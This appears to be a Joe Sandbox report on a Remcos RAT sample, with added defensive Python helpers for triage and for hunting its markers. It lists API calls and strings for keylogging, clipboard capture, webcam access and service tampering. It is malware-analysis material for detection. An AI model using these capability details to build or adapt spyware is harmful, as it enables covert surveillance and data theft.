                                                                              • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                              • Opcode Fuzzy Hash: 9f2292de5349cbb89b874ac3832283976b5779146be5ef793b8f579563e3040a
                                                                              • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                              APIs
                                                                              • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: Console$AllocOutputShowWindow
                                                                              • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                              • API String ID: 2425139147-2527699604
                                                                              • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                              • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                              • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                              • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID:
                                                                              • String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$BG
                                                                              • API String ID: 0-3292752334
                                                                              • Opcode ID: e181011d619ffb8157927409b25ecf3a74985ff587143acc6985ebda069ccb43
                                                                              • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                              • Opcode Fuzzy Hash: e181011d619ffb8157927409b25ecf3a74985ff587143acc6985ebda069ccb43
                                                                              • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                              APIs
                                                                              • __allrem.LIBCMT ref: 00439789
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                              • __allrem.LIBCMT ref: 004397BC
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                              • __allrem.LIBCMT ref: 004397F1
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                              • String ID:
                                                                              • API String ID: 1992179935-0
                                                                              • Opcode ID: 90d3cbeaf7f932440d57ef5c22d3b8f6324572cbadffe2a0eaa56fc6fd551e6e
                                                                              • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                              • Opcode Fuzzy Hash: 90d3cbeaf7f932440d57ef5c22d3b8f6324572cbadffe2a0eaa56fc6fd551e6e
                                                                              • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: __cftoe
                                                                              • String ID:
                                                                              • API String ID: 4189289331-0
                                                                              • Opcode ID: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                              • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                              • Opcode Fuzzy Hash: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                              • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: __freea$__alloca_probe_16
                                                                              • String ID: a/p$am/pm
                                                                              • API String ID: 3509577899-3206640213
                                                                              • Opcode ID: a9dc0d208de5fd7d1fb00aaf9429c157d058a6ef8680621eaae3a775435586b8
                                                                              • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                              • Opcode Fuzzy Hash: a9dc0d208de5fd7d1fb00aaf9429c157d058a6ef8680621eaae3a775435586b8
                                                                              • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: H_prologSleep
                                                                              • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                              • API String ID: 3469354165-462540288
                                                                              • Opcode ID: 2cf3f80b4c45a769136f44c7a35df47687b06a420c3cb7c44c4a57c06eb58bf2
                                                                              • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                              • Opcode Fuzzy Hash: 2cf3f80b4c45a769136f44c7a35df47687b06a420c3cb7c44c4a57c06eb58bf2
                                                                              • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                              • String ID:
                                                                              • API String ID: 493672254-0
                                                                              • Opcode ID: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                                                                              • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                              • Opcode Fuzzy Hash: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                                                                              • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                              • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: ErrorLastValue___vcrt_
                                                                              • String ID:
                                                                              • API String ID: 3852720340-0
                                                                              • Opcode ID: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                                                                              • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                              • Opcode Fuzzy Hash: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                                                                              • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                              • _free.LIBCMT ref: 00446EF6
                                                                              • _free.LIBCMT ref: 00446F1E
                                                                              • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                              • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                              • _abort.LIBCMT ref: 00446F3D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: ErrorLast$_free$_abort
                                                                              • String ID:
                                                                              • API String ID: 3160817290-0
                                                                              • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                              • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                              • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                              • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                              • String ID:
                                                                              • API String ID: 221034970-0
                                                                              • Opcode ID: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                                                                              • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                              • Opcode Fuzzy Hash: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                                                                              • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                              • String ID:
                                                                              • API String ID: 221034970-0
                                                                              • Opcode ID: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                                                                              • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                              • Opcode Fuzzy Hash: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                                                                              • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                              • String ID:
                                                                              • API String ID: 221034970-0
                                                                              • Opcode ID: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                                                                              • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                              • Opcode Fuzzy Hash: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                                                                              • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
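The four service functions above (OpenServiceW with access 0x2, 0x20 and 0x40, ChangeServiceConfigW with start type 0x4, ControlService with control codes 1, 2 and 3) print their arguments only as raw hex. The Python below is an added example written for this page, not Joe Sandbox or Remcos code. It parses function summaries in the report's flattened format, decodes those argument positions against the documented Win32 constants (SERVICE_CHANGE_CONFIG / SERVICE_STOP / SERVICE_PAUSE_CONTINUE, SERVICE_DISABLED, SERVICE_CONTROL_STOP / PAUSE / CONTINUE), and tags each function with the capability its API and string combination suggests, which also covers the cookie-clearing, webcam and clipboard records elsewhere in this section. SAMPLE is a constructed, shortened copy of a few records from this page; the capability table, the record names and the argument positions it trusts are this example's own assumptions.

```python
"""Triage helper for Joe Sandbox per-function summaries (added example, not report code).
Parses the flattened "APIs / API ID / String ID" records, decodes the service-control
arguments the report prints only as raw hex, and tags each function with the capability
its API+string combination implies. SAMPLE is a constructed copy of report records."""
import re
from dataclasses import dataclass, field

# One call line: optional "Part of subcall function X: ", Api.MODULE, optional "(args),"
# and the " ref: ADDR" the report always appends (LIBCMT entries carry no argument list).
CALL_RE = re.compile(r"^(?:Part of subcall function [0-9A-F]+: )?(\S+)\.([A-Z0-9_]+)"
                     r"(?:\((.*)\),)? ref: ([0-9A-F]+)$")

# Documented Win32 values for the argument positions decoded below.
SERVICE_CONTROL = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE", 3: "SERVICE_CONTROL_CONTINUE"}
START_TYPE = {2: "SERVICE_AUTO_START", 3: "SERVICE_DEMAND_START", 4: "SERVICE_DISABLED", 0xFFFFFFFF: "SERVICE_NO_CHANGE"}
SERVICE_ACCESS = {0x2: "SERVICE_CHANGE_CONFIG", 0x20: "SERVICE_STOP", 0x40: "SERVICE_PAUSE_CONTINUE"}

# (tag, any of these APIs called, all of these fragments present in String ID). Assumed mapping.
RULES = [
    ("service-tamper", {"ChangeServiceConfigW", "ControlService"}, ()),
    ("browser-cookie-wipe", set(), ("Chrome", "Cookies")),
    ("webcam-capture", set(), ("OpenCamera", "GetFrame")),
    ("clipboard-monitor", set(), ("[Text copied to clipboard]",)),
    ("keylogger", set(), ("Offline Keylogger Started",)),
    ("remcos-banner", set(), ("Remcos v",)),
]

@dataclass
class FuncRecord:
    calls: list = field(default_factory=list)  # (api, module, [hex args], ref)
    api_id: str = ""
    strings: str = ""                           # raw String ID value, '$'-separated
    api_string_id: str = ""

def _arg(args, i):
    """Argument i as int, or None when the sandbox printed '?' (value not recovered).
    Joe Sandbox also lists stack slots past the real parameter count: trust only leading positions."""
    return int(args[i], 16) if i < len(args) and args[i] != "?" else None

def parse_records(text):
    """One FuncRecord per function; 'API String ID:' is the field that closes each record."""
    records, cur = [], FuncRecord()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = CALL_RE.match(line)
        if m:
            api, module, args, ref = m.groups()
            cur.calls.append((api, module, args.split(",") if args else [], ref))
        elif line.startswith("API ID:"):
            cur.api_id = line[7:].strip()
        elif line.startswith("String ID:"):
            cur.strings = line[10:].strip()
        elif line.startswith("API String ID:"):
            cur.api_string_id = line[14:].strip()
            records.append(cur)
            cur = FuncRecord()
    return records

def decode_service_ops(rec):
    """Readable form of the service API arguments, positions per the Win32 prototypes."""
    ops = []
    for api, _mod, args, ref in rec.calls:
        if api == "OpenServiceW":
            ops.append(f"OpenServiceW access={SERVICE_ACCESS.get(_arg(args, 2), _arg(args, 2))} @{ref}")
        elif api == "ControlService":
            ops.append(f"ControlService {SERVICE_CONTROL.get(_arg(args, 1), _arg(args, 1))} @{ref}")
        elif api == "ChangeServiceConfigW":
            ops.append(f"ChangeServiceConfigW dwStartType={START_TYPE.get(_arg(args, 2), _arg(args, 2))} @{ref}")
    return ops

def tag(rec):
    apis = {c[0] for c in rec.calls}
    return [name for name, any_api, all_strs in RULES
            if (apis & any_api) or (all_strs and all(s in rec.strings for s in all_strs))]

def triage(text):
    return [{"api_string_id": r.api_string_id, "tags": tag(r), "service_ops": decode_service_ops(r)}
            for r in parse_records(text)]

# Constructed, shortened copy of records from this report (stack-slot arguments trimmed).
SAMPLE = r"""
APIs
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000), ref: 00419E10
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000), ref: 00419E52
• API ID: Service$CloseHandle$Open$ChangeConfigManager
• String ID:
• API String ID: 493672254-0
APIs
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?), ref: 00419C43
• ControlService.ADVAPI32(00000000,00000001,?,?), ref: 00419C5F
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
• API ID: DeleteErrorFileLast
• String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
• API String ID: 2018770650-304995407
APIs
• Sleep.KERNEL32(00000000), ref: 00403E8A
  • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
• API ID: H_prologSleep
• String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
• API String ID: 3469354165-462540288
"""
```

Feed the text of this section to triage() to get one entry per function. A None in the decoded output means the sandbox printed the value as "?", and a partial trailing record (one cut off before its API String ID line, as at the end of this section) is dropped rather than guessed. The tag list is a starting point for mapping the dump back to Remcos features, not a verdict; the String ID value is the evidence to quote.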
                                                                              APIs
                                                                              • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: Enum$InfoQueryValue
                                                                              • String ID: [regsplt]$DG
                                                                              • API String ID: 3554306468-1089238109
                                                                              • Opcode ID: 2c0c651cac9b710f1168a485f464d1fc739dd231b9536622f25106be1a0f90b4
                                                                              • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                              • Opcode Fuzzy Hash: 2c0c651cac9b710f1168a485f464d1fc739dd231b9536622f25106be1a0f90b4
                                                                              • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                              APIs
                                                                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                              • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                              • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                              • API String ID: 2974294136-753205382
                                                                              • Opcode ID: aa5d334bcd1812922a4ad084044b3d1b343442b21def6a42fbfd5f9bd3c8e3e6
                                                                              • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                              • Opcode Fuzzy Hash: aa5d334bcd1812922a4ad084044b3d1b343442b21def6a42fbfd5f9bd3c8e3e6
                                                                              • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                              • wsprintfW.USER32 ref: 0040A905
                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EventLocalTimewsprintf
                                                                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                              • API String ID: 1497725170-248792730
                                                                              • Opcode ID: 5536b12de62e79ab966806e0976d2ab96bef4cf8c19547705f00cc0b9e04f46c
                                                                              • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                              • Opcode Fuzzy Hash: 5536b12de62e79ab966806e0976d2ab96bef4cf8c19547705f00cc0b9e04f46c
                                                                              • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
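The two listings above give concrete hunting material: the clipboard logger brackets captured text between `[Text copied to clipboard]` and `[End of clipboard]`, and the keylogger header is built by `wsprintfW` from the fragments `[%04i/%02i/%02i %02i:%02i:%02i `, `Offline Keylogger Started` and `]`. The Python below is an added example, not part of the Joe Sandbox report or of the malware; it assumes the header is assembled exactly as those fragments suggest (for example `[2024/11/25 10:03:01 Offline Keylogger Started]`) and searches both UTF-16LE, which is what the wide-character APIs above leave in memory, and narrow ASCII in case a dropped log was written narrow. The sample buffer is constructed.

```python
import re
from typing import Dict, List, Tuple

# Marker strings taken from the Remcos listings above (String ID fields).
MARKERS = (
    "Offline Keylogger Started",
    "[Text copied to clipboard]",
    "[End of clipboard]",
)

# Assumed header layout: wsprintfW("[%04i/%02i/%02i %02i:%02i:%02i ") + label + "]".
HEADER_RE = re.compile(r"\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) ([^\]\r\n]+)\]")


def find_markers(blob: bytes) -> List[Tuple[int, str, str]]:
    """Every (offset, encoding, marker) hit, sorted by offset.

    wsprintfW and the clipboard logger are wide-character, so in-memory copies are
    UTF-16LE; ASCII is tried too in case a log file was written narrow (assumption).
    """
    hits = []
    for marker in MARKERS:
        for enc in ("ascii", "utf-16-le"):
            needle = marker.encode(enc)
            start = 0
            while (idx := blob.find(needle, start)) != -1:
                hits.append((idx, enc, marker))
                start = idx + 1
    return sorted(hits)


def parse_headers(text: str) -> List[Dict[str, str]]:
    """Timestamped headers in already-decoded text, as ISO-8601 strings plus the label."""
    out = []
    for m in HEADER_RE.finditer(text):
        y, mo, d, h, mi, s, label = m.groups()
        out.append({"timestamp": f"{y}-{mo}-{d}T{h}:{mi}:{s}", "label": label})
    return out


def headers_in_blob(blob: bytes) -> List[Dict[str, str]]:
    """Headers found in a raw buffer, decoded as narrow text and as UTF-16LE at both
    byte alignments (a carved region rarely starts on a 2-byte boundary)."""
    views = [blob.decode("latin-1")]
    for align in (0, 1):
        chunk = blob[align:]
        chunk = chunk[: len(chunk) - (len(chunk) % 2)]
        views.append(chunk.decode("utf-16-le", errors="ignore"))
    found = []
    for view in views:
        for h in parse_headers(view):
            if h not in found:
                found.append(h)
    return found


# Constructed sample: a wide keylogger header followed by a narrow clipboard record.
SAMPLE = (
    b"\x00" * 16
    + "[2024/11/25 10:03:01 Offline Keylogger Started]".encode("utf-16-le")
    + b"\x00" * 8
    + b"[Text copied to clipboard]hunter2[End of clipboard]"
)

if __name__ == "__main__":
    for off, enc, marker in find_markers(SAMPLE):
        print(f"0x{off:06x} {enc:<9} {marker}")
    print(headers_in_blob(SAMPLE))
```

Feed `find_markers` the raw `.sdmp` region named in the Memory Dump Source line, or a dropped log, rather than running `strings` first: default `strings` output is narrow only and will miss the UTF-16LE copies that the W APIs above produce.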
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                              • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleSizeSleep
                                                                              • String ID: `AG
                                                                              • API String ID: 1958988193-3058481221
                                                                              • Opcode ID: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
                                                                              • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                              • Opcode Fuzzy Hash: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
